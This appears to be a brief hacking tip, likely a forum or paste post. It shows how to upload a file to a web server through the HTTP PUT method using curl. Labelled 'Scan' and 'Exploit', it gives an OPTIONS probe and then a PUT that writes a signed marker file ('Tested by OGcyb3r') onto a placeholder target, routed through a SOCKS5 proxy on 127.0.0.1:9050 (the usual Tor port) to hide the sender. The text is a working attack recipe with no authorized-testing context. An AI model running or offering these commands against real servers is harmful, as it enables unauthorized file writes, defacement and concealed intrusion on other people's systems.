How to use HTTP-PUT method to upload your file to the webserver using curl command.
Scan:
curl -insecure -v -X OPTIONS https://TargetServerHere
Exploit:
curl -i -X PUT -H "Content-Type: text/plain; charset=utf-8" -d "Tested by OGcyb3r" https://TargetServerHere/ogcyb3r.txt --socks5 127.0.0.1:9050